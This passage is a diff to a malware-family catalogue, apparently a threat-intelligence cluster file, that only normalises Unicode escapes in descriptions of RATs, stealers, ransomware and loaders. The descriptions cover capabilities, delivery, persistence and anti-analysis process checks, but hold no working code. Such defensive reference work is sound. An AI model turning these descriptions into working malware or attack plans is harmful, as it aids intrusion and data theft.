The initial infection stage comes from a custom wget directly on the victim machine followed by a simple /bin/bash mr.sh. The script is a simple bash script which drops and executes additional software. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sustes", @@ -8072,7 +8072,7 @@ "value": "Ratty" }, { - "description": "Sorillus is a Java-based multifunctional remote access trojan (RAT) which targets Linux, macOS and Windows operating systems. While it was first created in 2019, interest in the tool has increased considerably in 2022. Beginning on January 18, 2022, different obfuscated client versions of the tool started to be uploaded to VirusTotal. Sorillus' features are described in detail on its website (hxxps://sorillus[.]com). The tool supposedly costs 49.99\u20ac for lifetime access but is currently available at a discounted 19.99\u20ac. Conveniently, the Sorillus can be purchased via a variety of cryptocurrencies. The tool's creator and distributor, a YouTube user known as \"Tapt\", asserts that the tool is able to collect the following information from its target:\r\n- HardwareID\r\n- Username\r\n- Country\r\n- Language\r\n- Webcam\r\n- Headless\r\n- Operating system\r\n- Client Version", + "description": "Sorillus is a Java-based multifunctional remote access trojan (RAT) which targets Linux, macOS and Windows operating systems. While it was first created in 2019, interest in the tool has increased considerably in 2022. Beginning on January 18, 2022, different obfuscated client versions of the tool started to be uploaded to VirusTotal. Sorillus' features are described in detail on its website (hxxps://sorillus[.]com). The tool supposedly costs 49.99€ for lifetime access but is currently available at a discounted 19.99€. Conveniently, the Sorillus can be purchased via a variety of cryptocurrencies. The tool's creator and distributor, a YouTube user known as \"Tapt\", asserts that the tool is able to collect the following information from its target:\r\n- HardwareID\r\n- Username\r\n- Country\r\n- Language\r\n- Webcam\r\n- Headless\r\n- Operating system\r\n- Client Version", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.sorillus", @@ -8173,7 +8173,7 @@ "value": "Bateleur" }, { - "description": "\u2022 BELLHOP is\ta JavaScript backdoor interpreted using the native Windows Scripting Host(WSH).\r\nAfter performing some basic host information gathering, the BELLHOP dropper\tdownloads a base64-encoded blob of JavaScript to disk and\tsets\tup persistence in three ways:\r\n\u2022 Creating a Run key in the Registry\r\n\u2022 Creating a RunOnce key in the Registry\r\n\u2022 Creating a persistent named scheduled task\r\n\u2022 BELLHOP communicates using HTTP\tand HTTPS with primarily benign sites such as Google\tDocs and PasteBin.\r\n", + "description": "• BELLHOP is\ta JavaScript backdoor interpreted using the native Windows Scripting Host(WSH).\r\nAfter performing some basic host information gathering, the BELLHOP dropper\tdownloads a base64-encoded blob of JavaScript to disk and\tsets\tup persistence in three ways:\r\n• Creating a Run key in the Registry\r\n• Creating a RunOnce key in the Registry\r\n• Creating a persistent named scheduled task\r\n• BELLHOP communicates using HTTP\tand HTTPS with primarily benign sites such as Google\tDocs and PasteBin.\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.bellhop", @@ -8249,7 +8249,7 @@ "value": "CukieGrab" }, { - "description": "Prevailion found this RAT written in JavaScript, which dynamically compiles an accompanying keylogger written in C# and uses a DGA f\u00fcr C&C.", + "description": "Prevailion found this RAT written in JavaScript, which dynamically compiles an accompanying keylogger written in C# and uses a DGA für C&C.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.darkwatchman", @@ -8418,7 +8418,7 @@ "value": "grelos" }, { - "description": "GRIFFON is a lightweight JavaScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. The first module downloaded by the GRIFFON malware to the victim\u2019s computer is an information-gathering JavaScript, which allows the cybercriminals to understand the context of the infected workstation.", + "description": "GRIFFON is a lightweight JavaScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JavaScript, which allows the cybercriminals to understand the context of the infected workstation.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon", @@ -8692,7 +8692,7 @@ "value": "NodeRAT" }, { - "description": "Ostap is a commodity JScript downloader first seen in campaigns in 2016. It has been observed being delivered in ACE archives and VBA macro-enabled Microsoft Office documents. Recent versions of Ostap query WMI to check for a blacklist of running processes:\r\n\r\nAgentSimulator.exe\r\nanti-virus.EXE\r\nBehaviorDumper\r\nBennyDB.exe\r\nctfmon.exe\r\nfakepos_bin\r\nFrzState2k\r\ngemu-ga.exe (Possible misspelling of Qemu hypervisor\u2019s guest agent, qemu-ga.exe)\r\nImmunityDebugger.exe\r\nKMS Server Service.exe\r\nProcessHacker\r\nprocexp\r\nProxifier.exe\r\npython\r\ntcpdump\r\nVBoxService\r\nVBoxTray.exe\r\nVmRemoteGuest\r\nvmtoolsd\r\nVMware2B.exe\r\nVzService.exe\r\nwinace\r\nWireshark\r\n\r\nIf a blacklisted process is found, the malware terminates.\r\n\r\nOstap has been observed delivering other malware families, including Nymaim, Backswap and TrickBot.", + "description": "Ostap is a commodity JScript downloader first seen in campaigns in 2016. It has been observed being delivered in ACE archives and VBA macro-enabled Microsoft Office documents. Recent versions of Ostap query WMI to check for a blacklist of running processes:\r\n\r\nAgentSimulator.exe\r\nanti-virus.EXE\r\nBehaviorDumper\r\nBennyDB.exe\r\nctfmon.exe\r\nfakepos_bin\r\nFrzState2k\r\ngemu-ga.exe (Possible misspelling of Qemu hypervisor’s guest agent, qemu-ga.exe)\r\nImmunityDebugger.exe\r\nKMS Server Service.exe\r\nProcessHacker\r\nprocexp\r\nProxifier.exe\r\npython\r\ntcpdump\r\nVBoxService\r\nVBoxTray.exe\r\nVmRemoteGuest\r\nvmtoolsd\r\nVMware2B.exe\r\nVzService.exe\r\nwinace\r\nWireshark\r\n\r\nIf a blacklisted process is found, the malware terminates.\r\n\r\nOstap has been observed delivering other malware families, including Nymaim, Backswap and TrickBot.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.ostap", @@ -9181,7 +9181,7 @@ "value": "CloudMensis" }, { - "description": "CoinThief was a malware package designed to steal Bitcoins from the victim, consisting of a binary patcher, browser extensions, and a backdoor component. \r\n\r\nIt was spreading in early 2014 from several different sources: \r\n- on Github (where the trojanized compiled binary didn\u2019t match the displayed source code), o\r\n- on popular and trusted download sites line CNET's Download.com or MacUpdate.com, and \r\n- as cracked applications via torrents camouflaged as Bitcoin Ticker TTM, BitVanity, StealthBit, Litecoin Ticker, BBEdit, Pixelmator, Angry Birds and Delicious Library.\r\n\r\nThe patcher\u2018s role was to locate and modify legitimate versions of the Bitcoin-Qt wallet application. The analyzed malware samples targeted versions of Bitcoin-Qt 0.8.1, 0.8.0 and 0.8.5. The earlier patch modified Bitcoin-Qt adding malicious code that would send nearly all the victim\u2019s Bitcoins to one of the hard-coded addresses belonging to the attacker. \r\n\r\nThe browser extensions targeted Chrome and Firefox and are disguised as a \u201cPop-up blocker\u201d. The extensions monitored visited websites, download malicious JavaScripts and injected them into various Bitcoin-related websites (mostly Bitcoin exchanges and online wallet sites). The injected JS scripts were able to modify transactions to redirect Bitcoin transfers to an attacker\u2019s address or simply harvest login credentials to the targeted online service.\r\n\r\nThe backdoor enabled the attacker to take full control over the victim\u2019s computer:\r\n- collect information about the infected computer\r\n- execute arbitrary shell scripts on the target computer\r\n- upload an arbitrary file from the victim\u2019s hard drive to a remote server\r\n- update itself to a newer version", + "description": "CoinThief was a malware package designed to steal Bitcoins from the victim, consisting of a binary patcher, browser extensions, and a backdoor component. \r\n\r\nIt was spreading in early 2014 from several different sources: \r\n- on Github (where the trojanized compiled binary didn’t match the displayed source code), o\r\n- on popular and trusted download sites line CNET's Download.com or MacUpdate.com, and \r\n- as cracked applications via torrents camouflaged as Bitcoin Ticker TTM, BitVanity, StealthBit, Litecoin Ticker, BBEdit, Pixelmator, Angry Birds and Delicious Library.\r\n\r\nThe patcher‘s role was to locate and modify legitimate versions of the Bitcoin-Qt wallet application. The analyzed malware samples targeted versions of Bitcoin-Qt 0.8.1, 0.8.0 and 0.8.5. The earlier patch modified Bitcoin-Qt adding malicious code that would send nearly all the victim’s Bitcoins to one of the hard-coded addresses belonging to the attacker. \r\n\r\nThe browser extensions targeted Chrome and Firefox and are disguised as a “Pop-up blocker”. The extensions monitored visited websites, download malicious JavaScripts and injected them into various Bitcoin-related websites (mostly Bitcoin exchanges and online wallet sites). The injected JS scripts were able to modify transactions to redirect Bitcoin transfers to an attacker’s address or simply harvest login credentials to the targeted online service.\r\n\r\nThe backdoor enabled the attacker to take full control over the victim’s computer:\r\n- collect information about the infected computer\r\n- execute arbitrary shell scripts on the target computer\r\n- upload an arbitrary file from the victim’s hard drive to a remote server\r\n- update itself to a newer version", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cointhief", @@ -9355,7 +9355,7 @@ "value": "Dummy" }, { - "description": "Eleanor comes as a drag-and-drop file utility called EasyDoc Converter. This application bundle wraps a shell script that uses Dropbox name as a disguise and installs three components: a hidden Tor service, a Pastebin agent and a web service with a PHP-based graphical interface.\r\n\r\nThe Tor service transforms the victim\u2019s computer into a server that provides attackers with full anonymous access to the infected machine via Tor-generated address. \r\n\r\nThe Pastebin agent uploads the address in encrypted form to the Pastebin website where the attackers can obtain it.\r\n\r\nThe web service is the main malicious component that provides the attackers with the control over the infected machine. After successful authentication, the interface offers several control panels to the attackers, allowing them to do the following actions:\r\n\r\n- Managing files\r\n- Listing processes\r\n- Connecting to various database management systems such as MySQL or SQLite\r\n- Connecting via bind/reverse shell\r\n- Executing shell command\r\n- Capturing and browsing images and videos from the victim\u2019s webcam\r\n- Sending emails with an attachment", + "description": "Eleanor comes as a drag-and-drop file utility called EasyDoc Converter. This application bundle wraps a shell script that uses Dropbox name as a disguise and installs three components: a hidden Tor service, a Pastebin agent and a web service with a PHP-based graphical interface.\r\n\r\nThe Tor service transforms the victim’s computer into a server that provides attackers with full anonymous access to the infected machine via Tor-generated address. \r\n\r\nThe Pastebin agent uploads the address in encrypted form to the Pastebin website where the attackers can obtain it.\r\n\r\nThe web service is the main malicious component that provides the attackers with the control over the infected machine. After successful authentication, the interface offers several control panels to the attackers, allowing them to do the following actions:\r\n\r\n- Managing files\r\n- Listing processes\r\n- Connecting to various database management systems such as MySQL or SQLite\r\n- Connecting via bind/reverse shell\r\n- Executing shell command\r\n- Capturing and browsing images and videos from the victim’s webcam\r\n- Sending emails with an attachment", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.eleanor", @@ -9536,7 +9536,7 @@ "value": "Gmera" }, { - "description": "According to Malwarebytes, The HiddenLotus \"dropper\" is an application named L\u00ea Thu H\u00e0 (HAEDC).pdf, using an old trick of disguising itself as a document - in this case, an Adobe Acrobat file.", + "description": "According to Malwarebytes, The HiddenLotus \"dropper\" is an application named Lê Thu Hà (HAEDC).pdf, using an old trick of disguising itself as a document - in this case, an Adobe Acrobat file.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.hiddenlotus", @@ -9976,7 +9976,7 @@ "value": "Patcher" }, { - "description": "Backdoor as a fork of OpenSSH_6.0 with no logging, and \u201c-P\u201d and \u201c-z\u201d hidden command arguments. \u201cPuffySSH_5.8p1\u201d string.", + "description": "Backdoor as a fork of OpenSSH_6.0 with no logging, and “-P” and “-z” hidden command arguments. “PuffySSH_5.8p1” string.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pintsized", @@ -10113,7 +10113,7 @@ "value": "Shlayer" }, { - "description": "According to Red Canary, Silver Sparrow is an activity cluster that includes a binary compiled to run on Apple\u2019s new M1 chips but has been distributed without payload so far.", + "description": "According to Red Canary, Silver Sparrow is an activity cluster that includes a binary compiled to run on Apple’s new M1 chips but has been distributed without payload so far.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.silver_sparrow", @@ -11080,7 +11080,7 @@ "value": "PowerWare" }, { - "description": "PowerZure is a PowerShell project created to assess and exploit resources within Microsoft\u2019s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.", + "description": "PowerZure is a PowerShell project created to assess and exploit resources within Microsoft’s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerzure", @@ -12332,7 +12332,7 @@ "value": "3CX Backdoor (Windows)" }, { - "description": "Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim\u2019s sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.", + "description": "Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim’s sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger", @@ -12411,7 +12411,7 @@ "value": "7ev3n" }, { - "description": "The 8Base ransomware group has remained relatively unknown despite the massive spike in activity in Summer of 2023. The group utilizes encryption paired with \u201cname-and-shame\u201d techniques to compel their victims to pay their ransoms. 8Base has an opportunistic pattern of compromise with recent victims spanning across varied industries. Despite the high amount of compromises, the information regarding identities, methodology, and underlying motivation behind these incidents still remains a mystery. Samples of their ransomware show they are using customized Phobos with SmokeLoader.", + "description": "The 8Base ransomware group has remained relatively unknown despite the massive spike in activity in Summer of 2023. The group utilizes encryption paired with “name-and-shame” techniques to compel their victims to pay their ransoms. 8Base has an opportunistic pattern of compromise with recent victims spanning across varied industries. Despite the high amount of compromises, the information regarding identities, methodology, and underlying motivation behind these incidents still remains a mystery. Samples of their ransomware show they are using customized Phobos with SmokeLoader.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.8base", @@ -12676,7 +12676,7 @@ "value": "Adamantium Thief" }, { - "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim\u2019s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.", + "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker", @@ -13042,7 +13042,7 @@ "value": "Albaniiutas" }, { - "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine\u2019s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.", + "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot", @@ -13229,7 +13229,7 @@ "value": "ALPC Local PrivEsc" }, { - "description": "The Alphabet ransomware is a new screenlocker that is currently being developed by a criminal developer. As the malware is not ready it does not affect any user files.\r\n\r\nThe virus includes a screenlocking function which locks the user\u2019s screen and prohibits any interaction with the computer.", + "description": "The Alphabet ransomware is a new screenlocker that is currently being developed by a criminal developer. As the malware is not ready it does not affect any user files.\r\n\r\nThe virus includes a screenlocking function which locks the user’s screen and prohibits any interaction with the computer.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphabet_ransomware", @@ -13282,7 +13282,7 @@ "value": "AlphaSeed" }, { - "description": "Alreay is a remote access trojan that uses HTTP(S) or TCP for communication with its C&C server.\r\n\r\nIt uses either RC4 or DES for encryption of its configuration, which is stored in the registry.\r\n\r\nIt sends detailed information about the victim's environment, like computer name, Windows version, \r\nsystem locale, and network configuration.\r\n\r\nIt supports almost 25 commands that include operations on the victim\u2019s filesystem, basic process management, file exfiltration, command line execution, and process injection of an executable downloaded from the attacker\u2019s C&C server. As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers, starting with values like 0x21A8B293, 0x23FAE29C or 0x91B93485.\r\n\r\nIt comes either as an EXE or as a DLL with the internal DLL name t_client_dll.dll. It may contain statically linked code from open-source libraries like Mbed TLS or zLib (version 1.0.1).\r\n\r\nAlreay RAT was observed in 2016-2017, running on networks of banks operating SWIFT Alliance software.", + "description": "Alreay is a remote access trojan that uses HTTP(S) or TCP for communication with its C&C server.\r\n\r\nIt uses either RC4 or DES for encryption of its configuration, which is stored in the registry.\r\n\r\nIt sends detailed information about the victim's environment, like computer name, Windows version, \r\nsystem locale, and network configuration.\r\n\r\nIt supports almost 25 commands that include operations on the victim’s filesystem, basic process management, file exfiltration, command line execution, and process injection of an executable downloaded from the attacker’s C&C server. As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers, starting with values like 0x21A8B293, 0x23FAE29C or 0x91B93485.\r\n\r\nIt comes either as an EXE or as a DLL with the internal DLL name t_client_dll.dll. It may contain statically linked code from open-source libraries like Mbed TLS or zLib (version 1.0.1).\r\n\r\nAlreay RAT was observed in 2016-2017, running on networks of banks operating SWIFT Alliance software.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alreay", @@ -13520,7 +13520,7 @@ "value": "Andromeda" }, { - "description": "According to Proofpoint, AndroMut is a new downloader malware written in C++ that Proofpoint researchers began observing in the wild in June 2019. The \u201cAndro\u201d part of the name comes from some of the pieces which bear resemblance to another downloader malware known as Andromeda [1] and \u201cMut\u201d is based off a mutex that the analyzed sample creates: \u201cmutshellmy777\u201d.", + "description": "According to Proofpoint, AndroMut is a new downloader malware written in C++ that Proofpoint researchers began observing in the wild in June 2019. The “Andro” part of the name comes from some of the pieces which bear resemblance to another downloader malware known as Andromeda [1] and “Mut” is based off a mutex that the analyzed sample creates: “mutshellmy777”.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromut", @@ -13804,7 +13804,7 @@ "value": "Ares (Windows)" }, { - "description": "AresLoader is a new malware \"downloader\" that has been advertised on some Russian language Dark Web forums \u201cRAMP and \"XSS\" by a threat actor called \"DarkBLUP\". Researchers assess this loader is likely a legitimate penetration testing tool that is now being abused by threat actors. This is because of a similar project, dubbed \u201cProject Ares,\u201d was previously uploaded to GitHub as a proof-of-concept (PoC) by the well-regarded user and red teamer \u201cCerberSec.\u201d\r\n\r\nThe loader mimics legitimate software to trick victims into executing malware with administrator rights on their machines. Additional features of the loader include:\r\n\r\n1. Written in C/C++\r\n2. Supports 64-bit payloads\r\n3. Makes it look like malware spawned by another process\r\n4. Prevents non-Microsoft signed binaries from being injected into malware\r\n5. Hides suspicious imported Windows APIs\r\n6. Leverages anti-analysis techniques to avoid reverse engineering\r\n\r\nFurthermore, It was observed that SystemBC, Amadey, and several Raccoon Stealers were directly installing AresLoader. To date, the AresLoader downloader has been seen delivering payloads like SystemBC, Lumma Stealer, StealC, Aurora Stealer, and Laplas Clipper.", + "description": "AresLoader is a new malware \"downloader\" that has been advertised on some Russian language Dark Web forums “RAMP and \"XSS\" by a threat actor called \"DarkBLUP\". Researchers assess this loader is likely a legitimate penetration testing tool that is now being abused by threat actors. This is because of a similar project, dubbed “Project Ares,” was previously uploaded to GitHub as a proof-of-concept (PoC) by the well-regarded user and red teamer “CerberSec.”\r\n\r\nThe loader mimics legitimate software to trick victims into executing malware with administrator rights on their machines. Additional features of the loader include:\r\n\r\n1. Written in C/C++\r\n2. Supports 64-bit payloads\r\n3. Makes it look like malware spawned by another process\r\n4. Prevents non-Microsoft signed binaries from being injected into malware\r\n5. Hides suspicious imported Windows APIs\r\n6. Leverages anti-analysis techniques to avoid reverse engineering\r\n\r\nFurthermore, It was observed that SystemBC, Amadey, and several Raccoon Stealers were directly installing AresLoader. To date, the AresLoader downloader has been seen delivering payloads like SystemBC, Lumma Stealer, StealC, Aurora Stealer, and Laplas Clipper.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aresloader", @@ -13920,7 +13920,7 @@ "value": "Arkei Stealer" }, { - "description": "It is available as a service, purchasable by anyone to use in their own campaigns. It\u2019s features are generally fairly typical of a RAT, with its most notable aspect being the hVNC module which basically gives an attacker full remote access with minimal need for technical knowledge to use it.", + "description": "It is available as a service, purchasable by anyone to use in their own campaigns. It’s features are generally fairly typical of a RAT, with its most notable aspect being the hVNC module which basically gives an attacker full remote access with minimal need for technical knowledge to use it.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.arrowrat", @@ -14108,7 +14108,7 @@ "value": "AstraLocker" }, { - "description": "AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victim\u2019s computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.", + "description": "AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victim’s computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat", @@ -14312,7 +14312,7 @@ "value": "ATOMSILO" }, { - "description": "Attor is a cyberespionage platform used in targeted attacks against diplomatic missions and governmental institutions since at least 2013. Its most interesting features are a complex modular architecture, elaborate network communications, and a unique plugin to fingerprint GSM/GPRS devices.\r\n\r\nAttor\u2019s core lies in its dispatcher, which serves as a management unit for additional plugins which provide all of malware\u2019s key capabilities. This allows the attackers to customize the platform on a per-victim basis. Plugins themselves are heavily synchronized. Network communication is based on Tor, aiming for anonymity and untraceability. \r\n\r\nThe most notable plugin can detect connected GSM/GPRS modems or mobile devices. Attor speaks to them directly using the AT command set, in order to collect sensitive information such as the IMEI, IMSI or MSISDN numbers, possibly identifying both the device and its subscriber. Other plugins provide persistence, an exfiltration channel, C&C communication and several further spying capabilities. The plugin responsible for capturing victim's screen targets social networks and blogging platforms, email services, office software, archiving utilities, file sharing and messaging services.", + "description": "Attor is a cyberespionage platform used in targeted attacks against diplomatic missions and governmental institutions since at least 2013. Its most interesting features are a complex modular architecture, elaborate network communications, and a unique plugin to fingerprint GSM/GPRS devices.\r\n\r\nAttor’s core lies in its dispatcher, which serves as a management unit for additional plugins which provide all of malware’s key capabilities. This allows the attackers to customize the platform on a per-victim basis. Plugins themselves are heavily synchronized. Network communication is based on Tor, aiming for anonymity and untraceability. \r\n\r\nThe most notable plugin can detect connected GSM/GPRS modems or mobile devices. Attor speaks to them directly using the AT command set, in order to collect sensitive information such as the IMEI, IMSI or MSISDN numbers, possibly identifying both the device and its subscriber. Other plugins provide persistence, an exfiltration channel, C&C communication and several further spying capabilities. The plugin responsible for capturing victim's screen targets social networks and blogging platforms, email services, office software, archiving utilities, file sharing and messaging services.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.attor", @@ -14776,7 +14776,7 @@ "value": "Azov Wiper" }, { - "description": "According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers\u2019 analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.", + "description": "According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers’ analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda", @@ -15343,7 +15343,7 @@ "value": "Bankshot" }, { - "description": "BanPolMex is a remote access trojan that uses TCP for communication.\r\n\r\nIt uses an RC4-like stream cipher called Spritz for encryption of its configuration and network traffic.\r\n\r\nIt sends detailed information about the victim's environment, like computer name, Windows version, free space of memory and all drives, processor identifier and architecture, system locale, system metrics, manufacturer, and network configuration.\r\n\r\nIt supports almost 30 commands that include operations on the victim\u2019s filesystem, basic process management, file exfiltration, and the download and execution of additional tools from the attacker\u2019s C&C server. As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers. However, in this case the indicis are convertible into a meaningful ASCII representation, that even suggests the functionality: SLEP, HIBN, DRIV, DIR, DIRP, CHDR, RUN, RUNX, DEL, WIPE, MOVE, FTIM, NEWF, DOWN, ZDWN, UPLD, PVEW, PKIL, CMDL, DIE, GCFG, SCFG, TCON, PEEX, PEIN.\r\n\r\nIt has aclui.dll as the internal DLL name. It contains statically linked code from open-source libraries like libcurl (version 7.47.1) or zLib (version 0.15).\r\n\r\nBanPolMex RAT was delivered for victims of a watering hole campaign targeting employees of Polish and Mexican banks, that was discovered in February 2017. It is usually loaded by HOTWAX.", + "description": "BanPolMex is a remote access trojan that uses TCP for communication.\r\n\r\nIt uses an RC4-like stream cipher called Spritz for encryption of its configuration and network traffic.\r\n\r\nIt sends detailed information about the victim's environment, like computer name, Windows version, free space of memory and all drives, processor identifier and architecture, system locale, system metrics, manufacturer, and network configuration.\r\n\r\nIt supports almost 30 commands that include operations on the victim’s filesystem, basic process management, file exfiltration, and the download and execution of additional tools from the attacker’s C&C server. As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers. However, in this case the indicis are convertible into a meaningful ASCII representation, that even suggests the functionality: SLEP, HIBN, DRIV, DIR, DIRP, CHDR, RUN, RUNX, DEL, WIPE, MOVE, FTIM, NEWF, DOWN, ZDWN, UPLD, PVEW, PKIL, CMDL, DIE, GCFG, SCFG, TCON, PEEX, PEIN.\r\n\r\nIt has aclui.dll as the internal DLL name. It contains statically linked code from open-source libraries like libcurl (version 7.47.1) or zLib (version 0.15).\r\n\r\nBanPolMex RAT was delivered for victims of a watering hole campaign targeting employees of Polish and Mexican banks, that was discovered in February 2017. It is usually loaded by HOTWAX.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.banpolmex", @@ -15802,7 +15802,7 @@ "value": "BestKorea" }, { - "description": "Cybereason concludes that Betabot is a sophisticated infostealer malware that\u2019s evolved significantly since it first appeared in late 2012. The malware began as a banking Trojan and is now packed with features that allow its operators to practically take over a victim\u2019s machine and steal sensitive information.", + "description": "Cybereason concludes that Betabot is a sophisticated infostealer malware that’s evolved significantly since it first appeared in late 2012. The malware began as a banking Trojan and is now packed with features that allow its operators to practically take over a victim’s machine and steal sensitive information.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot", @@ -15868,7 +15868,7 @@ "value": "BHunt" }, { - "description": "BianLian is a GoLang-based ransomware that continues to breach several industries and demand large ransom amounts. The threat actors also use the double extortion method by stealing an affected organization\u2019s files and leaking them online if the ransom is not paid on time. BianLian gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and exfiltrates victim data via File Transfer Protocol (FTP), Rclone, or Mega. BianLian originally employed a double-extortion model in which they encrypted victims\u2019 systems after exfiltrating the data; however, around January 2023, they shifted to primarily exfiltration-based extortion. The BianLian ransomware uses goroutines and encrypts files in chunks to quickly hijack an infected system. The ransomware adds its own extension to each encrypted file. ", + "description": "BianLian is a GoLang-based ransomware that continues to breach several industries and demand large ransom amounts. The threat actors also use the double extortion method by stealing an affected organization’s files and leaking them online if the ransom is not paid on time. BianLian gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and exfiltrates victim data via File Transfer Protocol (FTP), Rclone, or Mega. BianLian originally employed a double-extortion model in which they encrypted victims’ systems after exfiltrating the data; however, around January 2023, they shifted to primarily exfiltration-based extortion. The BianLian ransomware uses goroutines and encrypts files in chunks to quickly hijack an infected system. The ransomware adds its own extension to each encrypted file. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bianlian", @@ -16073,7 +16073,7 @@ "value": "Bitter RAT" }, { - "description": "According to Bitdefender, BitRAT is a notorious remote access trojan (RAT) marketed on underground cybercriminal web markets and forums. Its price tag of $20 for lifetime access makes it irresistible to cybercriminals and helps the malicious payload spread.\r\n\r\nFurthermore, each buyer\u2019s modus operandi makes BitRAT even harder to stop, considering it can be employed in various operations, such as trojanized software, phishing and watering hole attacks.\r\n\r\nBitRAT\u2019s popularity arises from its versatility. The malicious tool can perform a wide range of operations, including data exfiltration, UAC 